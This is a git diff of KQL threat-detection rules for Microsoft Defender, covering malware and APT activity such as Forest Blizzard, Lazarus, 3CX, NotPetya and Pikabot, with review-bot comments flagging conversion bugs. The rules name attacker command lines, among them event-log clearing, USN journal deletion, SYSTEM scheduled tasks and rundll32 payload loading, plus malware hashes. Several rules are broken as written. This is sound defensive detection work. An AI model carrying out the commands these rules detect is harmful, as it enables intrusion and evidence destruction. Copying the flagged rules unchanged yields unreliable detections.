+DeviceProcessEvents
 | where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "/s" and ProcessCommandLine contains "/i" and ProcessCommandLine contains "\\AppData\\Roaming\\" and ProcessCommandLine contains ".ocx"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
index e4f65936..a9ffd5af 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/exploit_for_cve_2015_1641.kql
@@ -1,10 +1,10 @@
-// Title: Exploit for CVE-2015-1641
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018-02-22
-// Level: critical
-// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Exploit for CVE-2015-1641
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-02-22
+// Level: critical
+// Description: Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, cve.2015-1641, detection.emerging-threats
+
+DeviceProcessEvents
 | where FolderPath endswith "\\MicroScMgmt.exe" and InitiatingProcessFolderPath endswith "\\WINWORD.EXE"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
index 4f3041d9..27c971e5 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/flowcloud_registry_markers.kql
@@ -1,13 +1,13 @@
-// Title: FlowCloud Registry Markers
-// Author: NVISO
-// Date: 2020-06-09
-// Level: critical
-// Description: Detects FlowCloud malware registry markers from threat group TA410.
-// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: FlowCloud Registry Markers
+// Author: NVISO
+// Date: 2020-06-09
+// Level: critical
+// Description: Detects FlowCloud malware registry markers from threat group TA410.
+// The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\HARDWARE\\{2DB80286-1784-48b5-A751-B6ED1F490303}" or RegistryKey contains "\\HARDWARE\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" or RegistryKey contains "\\HARDWARE\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" or RegistryKey endswith "\\SYSTEM\\Setup\\PrintResponsor*"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
index e188b769..3f7ccead 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_file_creation_activity.kql
@@ -1,13 +1,13 @@
-// Title: Forest Blizzard APT - File Creation Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-04-23
-// Level: high
-// Description: Detects the creation of specific files inside of ProgramData directory.
-// These files were seen being created by Forest Blizzard as described by MSFT.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Forest Blizzard APT - File Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the creation of specific files inside of ProgramData directory.
+// These files were seen being created by Forest Blizzard as described by MSFT.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where ((FolderPath contains "\\prnms003.inf_" or FolderPath contains "\\prnms009.inf_") and (FolderPath startswith "C:\\ProgramData\\Microsoft\\v" or FolderPath startswith "C:\\ProgramData\\Adobe\\v" or FolderPath startswith "C:\\ProgramData\\Comms\\v" or FolderPath startswith "C:\\ProgramData\\Intel\\v" or FolderPath startswith "C:\\ProgramData\\Kaspersky Lab\\v" or FolderPath startswith "C:\\ProgramData\\Bitdefender\\v" or FolderPath startswith "C:\\ProgramData\\ESET\\v" or FolderPath startswith "C:\\ProgramData\\NVIDIA\\v" or FolderPath startswith "C:\\ProgramData\\UbiSoft\\v" or FolderPath startswith "C:\\ProgramData\\Steam\\v")) or (FolderPath startswith "C:\\ProgramData\\" and ((FolderPath endswith ".save" or FolderPath endswith "\\doit.bat" or FolderPath endswith "\\execute.bat" or FolderPath endswith "\\servtask.bat") or (FolderPath contains "\\wayzgoose" and FolderPath endswith ".dll")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
index cad7ef5f..bc45385d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_javascript_constrained_file_creation.kql
@@ -1,13 +1,13 @@
-// Title: Forest Blizzard APT - JavaScript Constrained File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-04-23
-// Level: medium
-// Description: Detects the creation of JavaScript files inside of the DriverStore directory.
-// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceFileEvents
+// Title: Forest Blizzard APT - JavaScript Constrained File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: medium
+// Description: Detects the creation of JavaScript files inside of the DriverStore directory.
+// Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
 | where FolderPath endswith "\\.js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"
\ No newline at end of file
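Review bot: `FolderPath endswith "\\.js"` on the new side only matches a file literally named `.js` (a path separator immediately followed by the extension), so a JavaScript file with any real name under the DriverStore path is missed; this looks like a wildcard dropped during conversion rather than the rule's intent. If any `.js` file in that tree is meant, the predicate should read `| where FolderPath endswith ".js" and FolderPath startswith "C:\\Windows\\System32\\DriverStore\\FileRepository\\"`. Worth confirming against the source rule before changing it.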
diff --git a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
index f57c76cd..3daa2658 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/forest_blizzard_apt_process_creation_activity.kql
@@ -1,11 +1,11 @@
-// Title: Forest Blizzard APT - Process Creation Activity
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-04-23
-// Level: high
-// Description: Detects the execution of specific processes and command line combination.
-// These were seen being created by Forest Blizzard as described by MSFT.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Forest Blizzard APT - Process Creation Activity
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-04-23
+// Level: high
+// Description: Detects the execution of specific processes and command line combination.
+// These were seen being created by Forest Blizzard as described by MSFT.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where (SHA256 startswith "6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f" or SHA256 startswith "c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5") or (ProcessCommandLine contains "Get-ChildItem" and ProcessCommandLine contains ".save" and ProcessCommandLine contains "Compress-Archive -DestinationPath C:\\ProgramData\\") or ((ProcessCommandLine contains "servtask.bat" or ProcessCommandLine contains "execute.bat" or ProcessCommandLine contains "doit.bat") and (ProcessCommandLine contains "Create" and ProcessCommandLine contains "/RU" and ProcessCommandLine contains "SYSTEM" and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe") or ((ProcessCommandLine contains "Delete" and ProcessCommandLine contains "/F " and ProcessCommandLine contains "\\Microsoft\\Windows\\WinSrv") and FolderPath endswith "\\schtasks.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
index 60139c6e..ce83edc5 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/icedid_malware_suspicious_single_digit_dll_execution_via_rundll32.kql
@@ -1,10 +1,10 @@
-// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-31
-// Level: high
-// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
index 6a337236..2b16cf5e 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/kapeka_backdoor_execution_via_rundll32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Kapeka Backdoor Execution Via RunDLL32.EXE
-// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-07-03
-// Level: high
-// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Kapeka Backdoor Execution Via RunDLL32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-07-03
+// Level: high
+// Description: Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains "\\AppData\\Local") and ((ProcessCommandLine contains ".wll" and ProcessCommandLine contains "#1" and ProcessCommandLine contains " -d") or (ProcessCommandLine contains ".wll" and ProcessCommandLine endswith "#1"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
index 63635772..c4eb1c3d 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_apt_dll_sideloading_activity.kql
@@ -1,12 +1,12 @@
-// Title: Lazarus APT DLL Sideloading Activity
-// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-10-18
-// Level: high
-// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Lazarus APT DLL Sideloading Activity
+// Author: Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-10-18
+// Level: high
+// Description: Detects sideloading of trojanized DLLs used in Lazarus APT campaign in the case of a Spanish aerospace company
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001, attack.g0032, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\colorcpl.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\colorui.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\tabcal.exe" and FolderPath =~ "C:\\ProgramData\\Adobe\\ARM\\HID.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramData\\Oracle\\Java\\fixmapi.exe" and FolderPath =~ "C:\\ProgramData\\Oracle\\Java\\mapistub.dll") or (InitiatingProcessFolderPath =~ "C:\\ProgramShared\\PresentationHost.exe" and FolderPath =~ ":\\ProgramShared\\mscoree.dll")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
index 58cbc6eb..577ea20e 100644
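Review bot: The fourth branch tests `FolderPath =~ ":\\ProgramShared\\mscoree.dll"` for equality against a value that begins with `:\\`, which no full path can equal, so that sideloading pair can never match; the other three branches and the paired `InitiatingProcessFolderPath` in the same clause all use complete `C:\\...` paths. Either restore the drive letter, `FolderPath =~ "C:\\ProgramShared\\mscoree.dll"`, or, if leaving the drive open was deliberate, switch the operator to `FolderPath endswith ":\\ProgramShared\\mscoree.dll"`.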
--- a/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/lazarus_system_binary_masquerading.kql
@@ -1,12 +1,12 @@
-// Title: Lazarus System Binary Masquerading
-// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
-// Date: 2020-06-03
-// Level: high
-// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Lazarus System Binary Masquerading
+// Author: Trent Liffick (@tliffick), Bartlomiej Czyz (@bczyz1)
+// Date: 2020-06-03
+// Level: high
+// Description: Detects binaries used by the Lazarus group which use system names but are executed and launched from non-default location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\msdtc.exe" or FolderPath endswith "\\gpsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
index 03e80c6b..1f4c3a8a 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/malicious_dll_load_by_compromised_3cxdesktopapp.kql
@@ -1,12 +1,12 @@
-// Title: Malicious DLL Load By Compromised 3CXDesktopApp
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-31
-// Level: critical
-// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, detection.emerging-threats
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Malicious DLL Load By Compromised 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-31
+// Level: critical
+// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where (SHA256 startswith "7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896" or SHA256 startswith "11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03" or SHA256 startswith "F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952" or SHA256 startswith "8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423") or (SHA1 startswith "BF939C9C261D27EE7BB92325CC588624FCA75429" or SHA1 startswith "20D554A80D759C50D6537DD7097FED84DD258B3E" or SHA1 startswith "894E7D4FFD764BB458809C7F0643694B036EAD30" or SHA1 startswith "3B3E778B647371262120A523EB873C20BB82BEAF") or (MD5 startswith "74BC2D0B6680FAA1A5A76B27E5479CBC" or MD5 startswith "82187AD3F0C6C225E2FBA0C867280CC9" or MD5 startswith "11BC82A9BD8297BD0823BCE5D6202082" or MD5 startswith "7FAEA2B01796B80D180399040BB69835")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
index 6f1cf2ee..38aaae2e 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/notpetya_ransomware_activity.kql
@@ -1,10 +1,10 @@
-// Title: NotPetya Ransomware Activity
-// Author: Florian Roth (Nextron Systems), Tom Ueltschi
-// Date: 2019-01-16
-// Level: critical
-// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: NotPetya Ransomware Activity
+// Author: Florian Roth (Nextron Systems), Tom Ueltschi
+// Date: 2019-01-16
+// Level: critical
+// Description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, attack.t1070.001, attack.credential-access, attack.t1003.001, car.2016-04-002, detection.emerging-threats
+
+DeviceProcessEvents
 | where "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" or ProcessCommandLine endswith ".dat #1" or ProcessCommandLine endswith ".zip.dll\",#1") and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine contains "wevtutil cl Application & fsutil usn deletejournal /D C:" or ProcessCommandLine contains "dllhost.dat %WINDIR%\\ransoms")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
index e89e99dc..2b2918a2 100644
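Review bot: `| where "\\perfc.dat" or (...)` opens the predicate with a bare string literal and no column, which is not a boolean expression, so KQL rejects the whole query and this rule does not run at all; the commit reformats the file without addressing it. The field name was presumably lost in conversion. Judging by the rest of the clause it should be something like `| where ProcessCommandLine contains "\\perfc.dat" or ((ProcessCommandLine endswith ".dat,#1" ...`, with the remaining terms unchanged — confirm the intended field against the source rule.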
--- a/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
@@ -1,10 +1,10 @@
-// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
-// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-01-26
-// Level: high
-// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-26
+// Level: high
+// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,")
or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
index aab412c6..d73050a1 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_apt_c_12_bluemushroom_dll_load_activity_via_regsvr32.kql
@@ -1,10 +1,10 @@
-// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
-// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019-10-02
-// Level: medium
-// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
-
-DeviceProcessEvents
+// Title: Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
+// Author: Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-02
+// Level: medium
+// Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010, detection.emerging-threats
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "regsvr32" and ProcessCommandLine contains "\\AppData\\Local\\" and ProcessCommandLine contains ".dll" and ProcessCommandLine contains ",DllEntry"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
index 8985cf3b..ba655e8f 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_execution.kql
@@ -1,12 +1,12 @@
-// Title: Potential Compromised 3CXDesktopApp Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-03-29
-// Level: high
-// Description: Detects execution of known compromised version of 3CXDesktopApp
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
-// False Positives:
-// - Legitimate usage of 3CXDesktopApp
-
-DeviceProcessEvents
+// Title: Potential Compromised 3CXDesktopApp Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-29
+// Level: high
+// Description: Detects execution of known compromised version of 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.emerging-threats
+// False Positives:
+// - Legitimate usage of 3CXDesktopApp
+
+DeviceProcessEvents
 | where ((ProcessVersionInfoOriginalFileName =~ "3CXDesktopApp.exe" or FolderPath endswith "\\3CXDesktopApp.exe" or ProcessVersionInfoProductName =~ "3CX Desktop App") and ProcessVersionInfoProductVersion contains "18.12.") or ((SHA256 startswith "DDE03348075512796241389DFEA5560C20A3D2A2EAC95C894E7BBED5E85A0ACC" or SHA256 startswith "54004DFAA48CA5FA91E3304FB99559A2395301C570026450882D6AAD89132A02" or SHA256 startswith "D45674F941BE3CCA2FBC1AF42778043CC18CD86D95A2ECB9E6F0E212ED4C74AE" or SHA256 startswith "FAD482DED2E25CE9E1DD3D3ECC3227AF714BDFBBDE04347DBC1B21D6A3670405" or SHA256 startswith "5D99EFA36F34AA6B43CD81E77544961C5C8D692C96059FEF92C2DF2624550734" or SHA256 startswith "A60A61BF844BC181D4540C9FAC53203250A982E7C3AD6153869F01E19CC36203" or SHA256 startswith "AA124A4B4DF12B34E74EE7F6C683B2EBEC4CE9A8EDCF9BE345823B4FDCF5D868" or SHA256 startswith "59E1EDF4D82FAE4978E97512B0331B7EB21DD4B838B850BA46794D9C7A2C0983") or (SHA1 startswith "480DC408EF50BE69EBCF84B95750F7E93A8A1859" or SHA1 startswith "3B43A5D8B83C637D00D769660D01333E88F5A187" or SHA1 startswith
"6285FFB5F98D35CD98E78D48B63A05AF6E4E4DEA" or SHA1 startswith "E272715737B51C01DC2BED0F0AEE2BF6FEEF25F1" or SHA1 startswith "8433A94AEDB6380AC8D4610AF643FB0E5220C5CB" or SHA1 startswith "413D9CBFCBF8D1E8304EAB0AA5484F5EEC5185F5" or SHA1 startswith "BEA77D1E59CF18DCE22AD9A2FAD52948FD7A9EFA" or SHA1 startswith "BFECB8CE89A312D2EF4AFC64A63847AE11C6F69E") or (MD5 startswith "BB915073385DD16A846DFA318AFA3C19" or MD5 startswith "08D79E1FFFA244CC0DC61F7D2036ACA9" or MD5 startswith "4965EDF659753E3C05D800C6C8A23A7A" or MD5 startswith "9833A4779B69B38E3E51F04E395674C6" or MD5 startswith "704DB9184700481A56E5100FB56496CE" or MD5 startswith "8EE6802F085F7A9DF7E0303E65722DC0" or MD5 startswith "F3D4144860CA10BA60F7EF4D176CC736" or MD5 startswith "0EEB1C0133EB4D571178B2D9D14CE3E9"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
index 7e7e0e57..a160a293 100644
--- a/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
+++ b/KQL/rules-emerging-threats/Defense Evasion/potential_compromised_3cxdesktopapp_update_activity.kql
